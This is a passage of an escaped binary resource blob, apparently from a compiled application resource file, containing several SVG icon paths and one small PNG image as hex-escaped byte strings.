8\\\n48.65 435.83 850\\\n.31 422.42 851.1\\\n4 408.99 C 853.6\\\n1 376.17 855.96 \\\n343.34 858.33 31\\\n0.52 Z\\x22 />\\x0d\\x0a\\x0d\\x0a\\x0d\\\n\\x0a\\x0d\\x0a\\\n\\x00\\x00\\x0b\\x0d\\\n<\\\n?xml version=\\x221.\\\n0\\x22 encoding=\\x22UTF\\\n-8\\x22 ?>\\x0d\\x0a\\x0d\\x0a\\x0d\\x0a\\x0d\\x0a<\\\npath fill=\\x22#ffff\\\nff\\x22 opacity=\\x221.0\\\n0\\x22 d=\\x22 M 378.00 \\\n51.01 C 418.78 2\\\n3.85 468.01 9.58\\\n 517.01 10.91 C \\\n596.16 11.49 672\\\n.99 54.81 716.05\\\n 120.96 C 741.66\\\n 158.90 755.84 2\\\n04.28 757.14 249\\\n.99 C 703.76 250\\\n.04 650.39 249.9\\\n6 597.01 250.01 \\\nC 596.98 264.00 \\\n596.98 278.00 59\\\n7.01 291.99 C 65\\\n0.34 292.03 703.\\\n66 291.96 756.99\\\n 292.01 C 757.01\\\n 315.00 757.02 3\\\n38.00 757.00 360\\\n.99 C 703.67 361\\\n.03 650.34 360.9\\\n6 597.01 361.01 \\\nC 596.98 375.00 \\\n596.98 389.00 59\\\n7.01 402.99 C 65\\\n0.33 403.03 703.\\\n66 402.96 756.99\\\n 403.01 C 757.01\\\n 425.67 757.02 4\\\n48.33 756.99 470\\\n.99 C 703.77 471\\\n.18 650.54 470.6\\\n8 597.32 471.22 \\\nC 596.87 485.47 \\\n596.94 499.73 59\\\n7.01 513.99 C 65\\\n0.41 514.03 703.\\\n80 513.96 757.21\\\n 514.01 C 755.76\\\n 576.34 728.79 6\\\n37.68 684.30 681\\\n.30 C 662.85 703\\\n.59 636.37 720.5\\\n6 608.26 733.21 \\\nC 548.06 759.13 \\\n477.33 759.88 41\\\n7.00 734.00 C 35\\\n7.36 709.40 308.\\\n97 659.80 284.92\\\n 600.05 C 273.70\\\n 572.79 267.80 5\\\n43.44 266.85 514\\\n.01 C 320.23 513\\\n.96 373.61 514.0\\\n4 426.98 513.99 \\\nC 427.05 499.76 \\\n427.11 485.53 42\\\n6.76 471.31 C 37\\\n3.51 470.57 320.\\\n26 471.22 267.01\\\n 470.99 C 266.98\\\n 448.33 266.98 4\\\n25.67 267.01 403\\\n.01 C 320.33 402\\\n.97 373.66 403.0\\\n3 426.99 402.99 \\\nC 427.02 388.99 \\\n427.02 375.00 42\\\n6.99 361.01 C 37\\\n3.66 360.97 320.\\\n33 361.03 267.01\\\n 360.99 C 266.99\\\n 337.99 266.98 3\\\n15.00 267.00 292\\\n.01 C 320.33 291\\\n.97 373.66 292.0\\\n4 426.99 291.99 \\\nC 427.02 277.99 \\\n427.02 264.00 42\\\n6.99 250.01 C 37\\\n3.59 249.97 320.\\\n19 250.04 266.79\\\n 249.99 C 268.28\\\n 170.77 311.75 9\\\n4.16 378.00 51.0\\\n1 Z\\x22 />\\x0d\\x0a\\x0d\\x0a\\x0d\\x0a\\x0d\\x0a\\\n\\x00\\x00\\x22\\xdf\\\n<\\\n?xml version=\\x221.\\\n0\\x22 encoding=\\x22UTF\\\n-8\\x22?>\\x0a\\x0a\\x09\\x0a\\x09\\x0a\\x09\\x0a\\x09\\x0a\\x09\\x0a\\x09\\x0a\\x09\\x09\\\n\\x0a\\\n\\x09\\x0a\\x09\\\n\\x0a\\x09\\x09\\x0a\\x09\\x0a\\x09<\\\npath\\x0a\\x09\\x09d=\\x22M70.71\\\n19 37C72.5068 37\\\n 73.9619 35.5449\\\n 73.9619 33.75C7\\\n3.9619 31.9551 7\\\n2.5068 30.5 70.7\\\n119 30.5C68.9169\\\n 30.5 67.4619 31\\\n.9551 67.4619 33\\\n.75C67.4619 35.5\\\n449 68.9169 37 7\\\n0.7119 37Z\\x22\\x0a\\x09\\x09fi\\\nll=\\x22#FF9D0B\\x22\\x0a\\x09/>\\\n\\x0a\\x09\\x0a\\x09\\x0a\\x09\\\n\\x0a\\x09\\x0a\\x09\\x0a\\x0a\\\n\\x00\\x00\\x84\\x00\\\n<\\\n?xml version=\\x221.\\\n0\\x22 encoding=\\x22UTF\\\n-8\\x22 standalone=\\x22\\\nno\\x22?>\\x0a\\x0a\\\n \\x0a \\x0a \\x0a \\x0a \\x0a <\\\npath\\x0a fill\\\n=\\x22#000000\\x22\\x0a \\\n opacity=\\x221\\x22\\x0a \\\n d=\\x22m 215.77\\\n896,180.19599 c \\\n-0.005,-0.099 0.\\\n095,-0.1701 0.18\\\n549,-0.16048 0.5\\\n343,0.003 1.0688\\\n4,-0.002 1.60337\\\n,-10e-4 0.0755,-\\\n0.003 0.15343,0.\\\n017 0.20474,0.07\\\n77 0.13271,0.142\\\n5 0.26641,0.2839\\\n9 0.40109,0.4244\\\n7 0.058,0.0653 0\\\n.12457,0.13491 0\\\n.13049,0.22831 -\\\n0.0237,0.02 -0.0\\\n469,0.04 -0.0698\\\n,0.0602 -0.241,-\\\n0.1539 -0.38974,\\\n-0.42347 -0.6228\\\n4,-0.58951 -0.12\\\n926,-0.009 -0.25\\\n926,0.005 -0.388\\\n76,0.001 0.33103\\\n,0.36449 0.62827\\\n,0.76087 0.96992\\\n,1.11574 0.17193\\\n,0.15668 0.0787,\\\n0.41233 0.0999,0\\\n.61786 0.0101,0.\\\n203 -0.26049,0.2\\\n0553 -0.37889,0.\\\n12403 -0.0641,-0\\\n.14529 -0.0202,-\\\n0.31488 -0.0353,\\\n-0.47029 -0.5683\\\n3,-0.004 -1.1366\\\n6,-0.003 -1.705,\\\n0 -0.008,0.15971\\\n 0.018,0.32373 -\\\n0.0269,0.47965 -\\\n0.12556,0.0592 -\\\n0.36335,0.0494 -\\\n0.36828,-0.13567\\\n -0.003,-0.59052\\\n 0.003,-1.18155 \\\n7.4e-4,-1.77232 \\\nm 0.53996,0.3692\\\n9 c -0.11174,0.0\\\n167 -0.20424,0.1\\\n2175 -0.20276,0.\\\n23895 -0.0104,0.\\\n15415 0.13937,0.\\\n31639 0.29378,0.\\\n27767 0.10114,-0\\\n.0157 0.16231,-0\\\n.11796 0.18205,-\\\n0.21313 0.0281,-\\\n0.1582 -0.11692,\\\n-0.32044 -0.2730\\\n7,-0.30349 m 0.7\\\n8861,0.022 c -0.\\\n12111,0.0445 -0.\\\n20029,0.18604 -0\\\n.15441,0.31487 0\\\n.0434,0.18301 0.\\\n32856,0.27059 0.\\\n41934,0.0808 0.1\\\n2605,-0.18149 -0\\\n.0656,-0.43891 -\\\n0.26493,-0.39562\\\n z\\x22\\x0a id=\\x22p\\\nath3\\x22\\x0a sty\\\nle=\\x22stroke-width\\\n:0.0249874\\x22 />\\x0a \\\n \\x0a\\\n \\x0a \\x0a \\x0a \\\n \\x0a \\\n \\x0a \\\n\\x0a \\x0a \\\n \\x0a \\x0a \\\n \\x0a \\\n\\x0a \\x0a \\x0a \\x0a \\\n\\x0a \\x0a \\\n\\x0a \\x0a \\x0a \\x0a \\\n \\x0a \\\n\\x0a \\x0a \\x0a \\\n\\x0a \\x0a \\x0a \\\n\\x0a \\\n \\x0a \\x0a \\\n \\x0a \\\n \\x0a \\\n\\x0a \\x0a <\\\npath\\x0a fill\\\n=\\x22#000000\\x22\\x0a \\\n opacity=\\x221\\x22\\x0a \\\n d=\\x22m 209.51\\\n872,184.46914 c \\\n-0.0271,-0.27387\\\n 0.38826,-0.3482\\\n9 0.49877,-0.125\\\n8 0.054,0.13567 \\\n0.022,0.28704 0.\\\n0321,0.42954 -0.\\\n007,1.15498 0.01\\\n21,2.30995 -0.00\\\n9,3.46467 -0.159\\\n6,0.0448 -0.3295\\\n5,0.0326 -0.4913\\\n7,0.006 -0.0407,\\\n-0.0969 -0.0276,\\\n-0.20426 -0.0289\\\n,-0.30677 0.0128\\\n,-1.15599 -0.010\\\n1,-2.31197 -0.00\\\n1,-3.46796 z\\x22\\x0a \\\n id=\\x22path24\\x22\\\n\\x0a style=\\x22s\\\ntroke-width:0.02\\\n49874\\x22 />\\x0a \\x0a \\x0a \\x0a \\\n \\x0a \\\n \\x0a \\x0a \\\n\\x0a \\x0a \\x0a \\x0a \\\n \\\n\\x0a \\x0a \\\n \\x0a \\\n \\x0a \\x0a \\\n \\x0a \\\n \\x0a \\x0a \\\n\\x0a <\\\npath\\x0a fill\\\n=\\x22#000000\\x22\\x0a \\\n opacity=\\x221\\x22\\x0a \\\n d=\\x22m 206.14\\\n917,188.64886 c \\\n0.14899,-0.0248 \\\n0.30809,-0.0395 \\\n0.45388,0.009 0.\\\n0525,0.20503 0.0\\\n382,0.4341 0.011\\\n3,0.64343 -0.083\\\n6,0.21464 -0.473\\\n11,0.16857 -0.48\\\n791,-0.0727 0.00\\\n2,-0.19262 -0.02\\\n69,-0.39208 0.02\\\n27,-0.57989 z\\x22\\x0a \\\n id=\\x22path42\\\n\\x22\\x0a style=\\x22\\\nstroke-width:0.0\\\n249874\\x22 />\\x0a <\\\npath\\x0a fill\\\n=\\x22#000000\\x22\\x0a \\\n opacity=\\x221\\x22\\x0a \\\n d=\\x22m 206.85\\\n786,188.64304 c \\\n0.14455,-0.0243 \\\n0.29453,-0.0223 \\\n0.43784,0.01 0.0\\\n607,0.38828 0.00\\\n7,0.78998 0.0207\\\n,1.18358 0.0178,\\\n0.17541 -0.16995\\\n,0.30753 -0.3275\\\n8,0.25969 -0.121\\\n11,-0.023 -0.219\\\n78,-0.13136 -0.2\\\n114,-0.26197 -0.\\\n004,-0.3369 9.9e\\\n-4,-0.67405 -0.0\\\n01,-1.0112 0.005\\\n,-0.0651 -0.005,\\\n-0.17187 0.0819,\\\n-0.17997 z\\x22\\x0a \\\n id=\\x22path43\\x22\\x0a \\\n style=\\x22str\\\noke-width:0.0249\\\n874\\x22 />\\x0a \\x0a <\\\npath\\x0a fill\\\n=\\x22#000000\\x22\\x0a \\\n opacity=\\x221\\x22\\x0a \\\n d=\\x22m 208.20\\\n395,188.65595 c \\\n0.15022,-0.0534 \\\n0.32068,-0.0392 \\\n0.47386,-0.003 0\\\n.0348,0.13517 0.\\\n0274,0.27945 -0.\\\n002,0.41486 -0.1\\\n041,0.23439 -0.5\\\n3183,0.15263 -0.\\\n51234,-0.11896 0\\\n.005,-0.0957 -0.\\\n0269,-0.21566 0.\\\n0407,-0.29311 z\\x22\\\n\\x0a id=\\x22path\\\n45\\x22\\x0a style\\\n=\\x22stroke-width:0\\\n.0249874\\x22 />\\x0a \\\n \\x0a \\x0a <\\\npath\\x0a fill\\\n=\\x22#000000\\x22\\x0a \\\n opacity=\\x221\\x22\\x0a \\\n d=\\x22m 210.29\\\n771,188.63089 c \\\n0.15343,-0.0111 \\\n0.31179,-0.0203 \\\n0.463,0.0147 0.0\\\n237,0.0995 0.019\\\n2,0.20224 0.0185\\\n,0.30374 -0.004,\\\n1.32988 -0.002,2\\\n.66001 -0.01,3.9\\\n8938 -0.008,0.31\\\n867 -0.54267,0.3\\\n3057 -0.55599,0.\\\n0111 -0.0143,-1.\\\n39214 -0.0133,-2\\\n.78504 -0.0133,-\\\n4.17718 -0.003,-\\\n0.0638 0.0264,-0\\\n.13846 0.0977,-0\\\n.14175 z\\x22\\x0a \\\n id=\\x22path48\\x22\\x0a \\\n style=\\x22strok\\\ne-width:0.024987\\\n4\\x22 />\\x0a \\x0a \\\n \\x0a \\x0a \\x0a \\x0a \\x0a\\\n \\\n\\x0a \\x0a \\\n\\x0a \\\n\\x0a \\x0a \\x0a \\x0a \\\n \\x0a \\\n\\x0a \\\n \\x0a \\\n \\x0a \\x0a \\\n\\x0a \\x0a \\\n \\x0a \\\n\\x0a \\x0a\\x0a\\\n\\x00\\x00\\x08\\x05\\\n<\\\n?xml version=\\x221.\\\n0\\x22 encoding=\\x22UTF\\\n-8\\x22 standalone=\\x22\\\nno\\x22?>\\x0d\\x0a\\x0d\\x0a \\x0d\\x0a \\x0d\\x0a \\\n \\x0d\\x0a \\\n \\x0d\\x0a \\x0d\\x0a\\x0d\\x0a\\\n\\x00\\x00\\x0e\\x98\\\n<\\\n?xml version=\\x221.\\\n0\\x22 encoding=\\x22UTF\\\n-8\\x22 ?>\\x0d\\x0a\\x0d\\x0a\\x0d\\x0a\\x0d\\x0a\\x0d\\x0a\\x0d\\x0a\\x0d\\x0a\\x0d\\x0a<\\\n/svg>\\x0d\\x0a\\\n\\x00\\x00\\x0b\\x0d\\\n<\\\n?xml version=\\x221.\\\n0\\x22 encoding=\\x22UTF\\\n-8\\x22 ?>\\x0d\\x0a\\x0d\\x0a\\x0d\\x0a\\x0d\\x0a<\\\npath fill=\\x22#0000\\\n00\\x22 opacity=\\x221.0\\\n0\\x22 d=\\x22 M 378.00 \\\n51.01 C 418.78 2\\\n3.85 468.01 9.58\\\n 517.01 10.91 C \\\n596.16 11.49 672\\\n.99 54.81 716.05\\\n 120.96 C 741.66\\\n 158.90 755.84 2\\\n04.28 757.14 249\\\n.99 C 703.76 250\\\n.04 650.39 249.9\\\n6 597.01 250.01 \\\nC 596.98 264.00 \\\n596.98 278.00 59\\\n7.01 291.99 C 65\\\n0.34 292.03 703.\\\n66 291.96 756.99\\\n 292.01 C 757.01\\\n 315.00 757.02 3\\\n38.00 757.00 360\\\n.99 C 703.67 361\\\n.03 650.34 360.9\\\n6 597.01 361.01 \\\nC 596.98 375.00 \\\n596.98 389.00 59\\\n7.01 402.99 C 65\\\n0.33 403.03 703.\\\n66 402.96 756.99\\\n 403.01 C 757.01\\\n 425.67 757.02 4\\\n48.33 756.99 470\\\n.99 C 703.77 471\\\n.18 650.54 470.6\\\n8 597.32 471.22 \\\nC 596.87 485.47 \\\n596.94 499.73 59\\\n7.01 513.99 C 65\\\n0.41 514.03 703.\\\n80 513.96 757.21\\\n 514.01 C 755.76\\\n 576.34 728.79 6\\\n37.68 684.30 681\\\n.30 C 662.85 703\\\n.59 636.37 720.5\\\n6 608.26 733.21 \\\nC 548.06 759.13 \\\n477.33 759.88 41\\\n7.00 734.00 C 35\\\n7.36 709.40 308.\\\n97 659.80 284.92\\\n 600.05 C 273.70\\\n 572.79 267.80 5\\\n43.44 266.85 514\\\n.01 C 320.23 513\\\n.96 373.61 514.0\\\n4 426.98 513.99 \\\nC 427.05 499.76 \\\n427.11 485.53 42\\\n6.76 471.31 C 37\\\n3.51 470.57 320.\\\n26 471.22 267.01\\\n 470.99 C 266.98\\\n 448.33 266.98 4\\\n25.67 267.01 403\\\n.01 C 320.33 402\\\n.97 373.66 403.0\\\n3 426.99 402.99 \\\nC 427.02 388.99 \\\n427.02 375.00 42\\\n6.99 361.01 C 37\\\n3.66 360.97 320.\\\n33 361.03 267.01\\\n 360.99 C 266.99\\\n 337.99 266.98 3\\\n15.00 267.00 292\\\n.01 C 320.33 291\\\n.97 373.66 292.0\\\n4 426.99 291.99 \\\nC 427.02 277.99 \\\n427.02 264.00 42\\\n6.99 250.01 C 37\\\n3.59 249.97 320.\\\n19 250.04 266.79\\\n 249.99 C 268.28\\\n 170.77 311.75 9\\\n4.16 378.00 51.0\\\n1 Z\\x22 />\\x0d\\x0a\\x0d\\x0a\\x0d\\x0a\\x0d\\x0a\\\n\\x00\\x00\\x0dW\\\n<\\\n?xml version=\\x221.\\\n0\\x22 encoding=\\x22UTF\\\n-8\\x22 standalone=\\x22\\\nno\\x22?>\\x0a\\x0a \\\n\\x0a \\x0a \\x0a \\\n \\x0a \\\n \\x0a \\x0a<\\\n/svg>\\x0a\\\n\\x00\\x00\\x0f\\xe5\\\n<\\\n?xml version=\\x221.\\\n0\\x22 encoding=\\x22UTF\\\n-8\\x22 standalone=\\x22\\\nno\\x22?>\\x0d\\x0a\\\n\\x0d\\x0a\\x0d\\x0a\\\n<\\\npath\\x0d\\x0a \\\n fill=\\x22#040404\\x22\\x0d\\\n\\x0a opac\\\nity=\\x221\\x22\\x0d\\x0a \\\n d=\\x22m 494.34,\\\n266.52 c 12.28,-\\\n1.91 24.37,4.89 \\\n31.94,14.21 10.8\\\n1,13.32 15.96,30\\\n.08 20.49,46.37 \\\n8.49,35.78 11.33\\\n,72.52 16.21,108\\\n.9 2.76,26.53 6.\\\n17,53.23 14.33,7\\\n8.73 2.36,1.45 6\\\n.65,2.65 7.75,-0\\\n.7 7.09,-13.03 1\\\n0.13,-27.82 13.8\\\n,-42.1 5.63,-22.\\\n69 9.33,-46.8 22\\\n.38,-66.71 5.49,\\\n-8.29 14.37,-15.\\\n2 24.68,-15.46 1\\\n1.97,-2.43 23.92\\\n,3.92 31.88,12.4\\\n3 16.2,19.36 19.\\\n89,45.85 35.49,6\\\n5.56 3.7,4.45 8.\\\n89,7.58 14.74,8.\\\n19 28.3,0.18 56.\\\n62,-0.06 84.93,0\\\n.1 0.05,12.3 0.1\\\n2,24.62 -0.01,36\\\n.93 -29.99,0.04 \\\n-59.98,0.08 -89.\\\n96,-0.02 -17.22,\\\n-1.02 -32.33,-12\\\n.13 -42.23,-25.7\\\n2 -11.02,-15.8 -\\\n17.75,-34.03 -25\\\n.55,-51.46 -1.55\\\n,-3.17 -6.27,-4.\\\n08 -7.86,-0.47 -\\\n8.92,25.4 -12.13\\\n,52.43 -21.21,77\\\n.78 -6.09,17.07 \\\n-15.1,34.5 -31.9\\\n2,43.12 -8.31,3.\\\n53 -18.11,4.78 -\\\n26.88,2.38 -4.5,\\\n-3.13 -10.57,-4.\\\n46 -13.26,-9.64 \\\n-14.3,-18.52 -18\\\n.44,-42.37 -22.2\\\n9,-64.87 -6.04,-\\\n37.41 -8.64,-75.\\\n28 -14.11,-112.7\\\n9 -3.64,-19.62 -\\\n6.7,-39.66 -15,-\\\n57.98 -1.14,-1.1\\\n4 -2.05,-2.89 -3\\\n.68,-3.29 -2.26,\\\n0.82 -4.96,2.27 \\\n-5.05,4.98 -6.34\\\n,16.95 -9.65,35.\\\n08 -12,53.02 -5.\\\n58,34.07 -6.75,6\\\n8.63 -10.16,102.\\\n91 -2.83,36.27 -\\\n5.33,72.8 -13.46\\\n,108.38 -3.8,15.\\\n63 -8.22,31.82 -\\\n18.26,44.76 -7.5\\\n7,10.21 -21.94,1\\\n3.61 -33.77,9.58\\\n -7.63,-2.67 -13\\\n.14,-8.71 -18.53\\\n,-14.41 -12.28,-\\\n17.18 -17.72,-37\\\n.84 -23.1,-57.93\\\n -8.3,-35.64 -12\\\n.94,-71.97 -21.1\\\n5,-107.66 -2.57,\\\n-10.22 -4.78,-20\\\n.59 -8.8,-30.37 \\\n-1.48,-1.54 -2.9\\\n6,-4.11 -5.5,-3.\\\n12 -2.45,1.96 -3\\\n.15,5.1 -4.11,7.\\\n93 -7.06,19.2 -9\\\n.69,39.6 -13.47,\\\n59.59 -3.92,20.8\\\n1 -7.22,41.89 -1\\\n3.99,62.03 -4.39\\\n,12.15 -9.89,24.\\\n44 -19.94,33.01 \\\n-5.09,3.06 -10.3\\\n5,6.82 -16.63,6.\\\n53 -14.51,2.96 -\\\n28.91,-5.74 -36.\\\n96,-17.4 -12.46,\\\n-18.08 -16.96,-3\\\n9.97 -24.66,-60.\\\n18 -4.3,-10.84 -\\\n8.31,-22.88 -18.\\\n65,-29.48 -4.05,\\\n-3.52 -9.98,-1.8\\\n1 -14.8,-3.11 -2\\\n5.66,-0.23 -51.3\\\n2,0.07 -76.98,-0\\\n.12 -0.04,-12.31\\\n -0.12,-24.62 0.\\\n02,-36.92 26.65,\\\n-0.09 53.3,0.01 \\\n79.96,-0.04 7.66\\\n,0.28 15.68,0.01\\\n 22.79,3.36 15.3\\\n4,5.35 25.96,18.\\\n55 33.65,32.27 8\\\n.85,16.45 14,34.\\\n53 19.95,52.16 2\\\n.79,5.59 3.42,12\\\n.4 7.81,17.1 l 4\\\n.71,0.13 c 4.83,\\\n-7.37 6.04,-16.1\\\n2 8.59,-24.36 6.\\\n07,-25.55 9.02,-\\\n51.73 15.01,-77.\\\n29 4.02,-18.47 9\\\n.06,-37.23 19.82\\\n,-53.04 4.8,-7.6\\\n2 12.67,-12.78 2\\\n1,-15.85 3.91,-0\\\n.36 7.76,-1.17 1\\\n1.68,-1.43 9.02,\\\n1.08 17.51,5.58 \\\n23.24,12.7 10.05\\\n,13.59 15.79,29.\\\n76 20.05,45.98 9\\\n.8,38.12 13.86,7\\\n7.41 23.14,115.6\\\n4 2.02,11.94 6.1\\\n4,23.41 10.52,34\\\n.65 0.94,2.51 3.\\\n4,3.57 5.96,2.98\\\n 2.82,-3.97 3.15\\\n,-8.84 4.53,-13.\\\n35 15.57,-79.43 \\\n12.18,-161.25 28\\\n.61,-240.58 4.2,\\\n-18.04 9.11,-36.\\\n64 20.26,-51.78 \\\n5.29,-8.07 14.28\\\n,-14.1 24.01,-14\\\n.76 z\\x22\\x0d\\x0a \\\n id=\\x22path1\\x22 />\\\n\\x0d\\x0a\\\n\\x00\\x00\\x0f\\xe5\\\n<\\\n?xml version=\\x221.\\\n0\\x22 encoding=\\x22UTF\\\n-8\\x22 standalone=\\x22\\\nno\\x22?>\\x0d\\x0a\\\n\\x0d\\x0a\\x0d\\x0a\\\n<\\\npath\\x0d\\x0a \\\n fill=\\x22#ffffff\\x22\\x0d\\\n\\x0a opac\\\nity=\\x221\\x22\\x0d\\x0a \\\n d=\\x22m 494.34,\\\n266.52 c 12.28,-\\\n1.91 24.37,4.89 \\\n31.94,14.21 10.8\\\n1,13.32 15.96,30\\\n.08 20.49,46.37 \\\n8.49,35.78 11.33\\\n,72.52 16.21,108\\\n.9 2.76,26.53 6.\\\n17,53.23 14.33,7\\\n8.73 2.36,1.45 6\\\n.65,2.65 7.75,-0\\\n.7 7.09,-13.03 1\\\n0.13,-27.82 13.8\\\n,-42.1 5.63,-22.\\\n69 9.33,-46.8 22\\\n.38,-66.71 5.49,\\\n-8.29 14.37,-15.\\\n2 24.68,-15.46 1\\\n1.97,-2.43 23.92\\\n,3.92 31.88,12.4\\\n3 16.2,19.36 19.\\\n89,45.85 35.49,6\\\n5.56 3.7,4.45 8.\\\n89,7.58 14.74,8.\\\n19 28.3,0.18 56.\\\n62,-0.06 84.93,0\\\n.1 0.05,12.3 0.1\\\n2,24.62 -0.01,36\\\n.93 -29.99,0.04 \\\n-59.98,0.08 -89.\\\n96,-0.02 -17.22,\\\n-1.02 -32.33,-12\\\n.13 -42.23,-25.7\\\n2 -11.02,-15.8 -\\\n17.75,-34.03 -25\\\n.55,-51.46 -1.55\\\n,-3.17 -6.27,-4.\\\n08 -7.86,-0.47 -\\\n8.92,25.4 -12.13\\\n,52.43 -21.21,77\\\n.78 -6.09,17.07 \\\n-15.1,34.5 -31.9\\\n2,43.12 -8.31,3.\\\n53 -18.11,4.78 -\\\n26.88,2.38 -4.5,\\\n-3.13 -10.57,-4.\\\n46 -13.26,-9.64 \\\n-14.3,-18.52 -18\\\n.44,-42.37 -22.2\\\n9,-64.87 -6.04,-\\\n37.41 -8.64,-75.\\\n28 -14.11,-112.7\\\n9 -3.64,-19.62 -\\\n6.7,-39.66 -15,-\\\n57.98 -1.14,-1.1\\\n4 -2.05,-2.89 -3\\\n.68,-3.29 -2.26,\\\n0.82 -4.96,2.27 \\\n-5.05,4.98 -6.34\\\n,16.95 -9.65,35.\\\n08 -12,53.02 -5.\\\n58,34.07 -6.75,6\\\n8.63 -10.16,102.\\\n91 -2.83,36.27 -\\\n5.33,72.8 -13.46\\\n,108.38 -3.8,15.\\\n63 -8.22,31.82 -\\\n18.26,44.76 -7.5\\\n7,10.21 -21.94,1\\\n3.61 -33.77,9.58\\\n -7.63,-2.67 -13\\\n.14,-8.71 -18.53\\\n,-14.41 -12.28,-\\\n17.18 -17.72,-37\\\n.84 -23.1,-57.93\\\n -8.3,-35.64 -12\\\n.94,-71.97 -21.1\\\n5,-107.66 -2.57,\\\n-10.22 -4.78,-20\\\n.59 -8.8,-30.37 \\\n-1.48,-1.54 -2.9\\\n6,-4.11 -5.5,-3.\\\n12 -2.45,1.96 -3\\\n.15,5.1 -4.11,7.\\\n93 -7.06,19.2 -9\\\n.69,39.6 -13.47,\\\n59.59 -3.92,20.8\\\n1 -7.22,41.89 -1\\\n3.99,62.03 -4.39\\\n,12.15 -9.89,24.\\\n44 -19.94,33.01 \\\n-5.09,3.06 -10.3\\\n5,6.82 -16.63,6.\\\n53 -14.51,2.96 -\\\n28.91,-5.74 -36.\\\n96,-17.4 -12.46,\\\n-18.08 -16.96,-3\\\n9.97 -24.66,-60.\\\n18 -4.3,-10.84 -\\\n8.31,-22.88 -18.\\\n65,-29.48 -4.05,\\\n-3.52 -9.98,-1.8\\\n1 -14.8,-3.11 -2\\\n5.66,-0.23 -51.3\\\n2,0.07 -76.98,-0\\\n.12 -0.04,-12.31\\\n -0.12,-24.62 0.\\\n02,-36.92 26.65,\\\n-0.09 53.3,0.01 \\\n79.96,-0.04 7.66\\\n,0.28 15.68,0.01\\\n 22.79,3.36 15.3\\\n4,5.35 25.96,18.\\\n55 33.65,32.27 8\\\n.85,16.45 14,34.\\\n53 19.95,52.16 2\\\n.79,5.59 3.42,12\\\n.4 7.81,17.1 l 4\\\n.71,0.13 c 4.83,\\\n-7.37 6.04,-16.1\\\n2 8.59,-24.36 6.\\\n07,-25.55 9.02,-\\\n51.73 15.01,-77.\\\n29 4.02,-18.47 9\\\n.06,-37.23 19.82\\\n,-53.04 4.8,-7.6\\\n2 12.67,-12.78 2\\\n1,-15.85 3.91,-0\\\n.36 7.76,-1.17 1\\\n1.68,-1.43 9.02,\\\n1.08 17.51,5.58 \\\n23.24,12.7 10.05\\\n,13.59 15.79,29.\\\n76 20.05,45.98 9\\\n.8,38.12 13.86,7\\\n7.41 23.14,115.6\\\n4 2.02,11.94 6.1\\\n4,23.41 10.52,34\\\n.65 0.94,2.51 3.\\\n4,3.57 5.96,2.98\\\n 2.82,-3.97 3.15\\\n,-8.84 4.53,-13.\\\n35 15.57,-79.43 \\\n12.18,-161.25 28\\\n.61,-240.58 4.2,\\\n-18.04 9.11,-36.\\\n64 20.26,-51.78 \\\n5.29,-8.07 14.28\\\n,-14.1 24.01,-14\\\n.76 z\\x22\\x0d\\x0a \\\n id=\\x22path1\\x22 />\\\n\\x0d\\x0a\\\n\\x00\\x00\\x05\\x08\\\n\\x89\\\nPNG\\x0d\\x0a\\x1a\\x0a\\x00\\x00\\x00\\x0dIHDR\\x00\\\n\\x00\\x00\\x1a\\x00\\x00\\x00\\x1a\\x08\\x06\\x00\\x00\\x00\\xa9JL\\xce\\\n\\x00\\x00\\x00\\x19tEXtSoftware\\\n\\x00Adobe ImageRead\\\nyq\\xc9e<\\x00\\x00\\x03\\x22iTXtXML\\\n:com.adobe.xmp\\x00\\x00\\\n\\x00\\x00\\x00 \\\n <\\\n/x:xmpmeta> \\x8d\\\n\\xf5\\xbc\\x97\\x00\\x00\\x01|IDATx\\xda\\xbcV\\x81\\\nm\\xc3 \\x10\\xc4U\\x07 \\x1bd\\x04W^\\xa0\\x9d \\\n\\xce\\x04u'\\xe8\\x0a\\xce\\x08\\x9e\\xc0\\xee\\x04q\\x07\\xb1\\xca\\\n&a\\x03\\xf7\\xa9\\xce\\xd2\\x97b\\xf3\\xe0\\xa8/!\\x12\\xc0\\\n\\x7f\\x7f\\x07\\xfcS\\xcc\\xf3\\xac\\xb8\\x15E\\xa1BVUU\\\nK\\xdd;5\\x8d!K\\xad\\x9b\\xa6\\xa9\\x0d\\xad\\xff\\xe3W\\\n\\x02D _\\xd4\\x95*l\\x86\\xc0\\x9eb@\\x0f*b\\\n`\\xb2\\x80\\x8c\\xd4^\\xd0F\\x8c\\x95X\\xb3iQF\\xe4\\\n\\xe4\\x06\\xb9F\\x8a\\xfc\\xec\\xcd]\\xa9\\xab\\x9d\\x8c4w\\xc8\\\nfD\\x8e4\\xdb\\x93\\x1a\\xa0<\\x80\\x1a\\x7fu\\x8cQT\\\n\\xba\\x00\\xf8Qe\\x98D\\xba\\x9f\\x05$M\\xb1\\x02\\x1c\\x9c\\\n\\xf7\\xfd>&0\\x99\\xf9^\\xb0\\xbd\\x13\\xd9\\xbfI'f\\\n\\xe4K\\xc3\\x98\\xcdw\\x05\\x92:\\x14\\x03-G\\xd8\\xbf\\x17\\\n\\x09\\x01-W\\xe0\\x10c\\xa4\\xd5>\\xd3I\\x87\\x81\\x22+\\\n3\\xd8<\\xe7\\x9c\\xba#\\xcb\\xd21\\xb315B@\\x06\\\n\\xfd\\x09}'\\x00\\xea\\xbco\\x8c\\x04\\xe8\\x03}\\xe3\\xe4C\\\n\\xbd1\\x1b \\xaeL\\xb4\\x90\\xba\\xf1|l\\x02\\x0dL\\x8a\\\n\\xde%V\\xd4\\x9b\\x8b'\\xa3\\xfb}qsH\\xbe=\\x1b\\\n\\x1fD\\xb9\\x8e>tY\\xf9\\xcadx#\\x87f\\xe3\\xd0\\\n\\xf4\\xacf\\x9di\\xed(\\xae\\xb0\\xe4\\xa0aQ.L?\\\n\\x11\\xb1\\xc5a91\\xb9\\x14\\x02\\x1a\\x92K9\\x98\\xf5\\x82\\\n\\xbbe\\x012f\\xbf\\x19\\xa0\\xbf\\x8b\\xfa5\\xf0n0\\xd8\\\n\\xf8\\x81@\\xec\\xee\\xc7\\xc9Z\\xbe[\\xabQY\\x8f\\x93{\\\nYl\\x8fR\\x8a\\xdb\\xaf\\x07J*#\\xbd7\\x99.\\xf6\\\n-\\xc0\\x00\\x03\\x80\\xc1\\xcd=\\xed\\xfe\\xf9\\x00\\x00\\x00\\x00I\\\nEND\\xaeB`\\x82\\\n\\x00\\x00\\x84\\x00\\\n<\\\n?xml version=\\x221.\\\n0\\x22 encoding=\\x22UTF\\\n-8\\x22 standalone=\\x22\\\nno\\x22?>\\x0a\\x0a\\\n \\x0a \\x0a \\x0a \\x0a \\x0a <\\\npath\\x0a 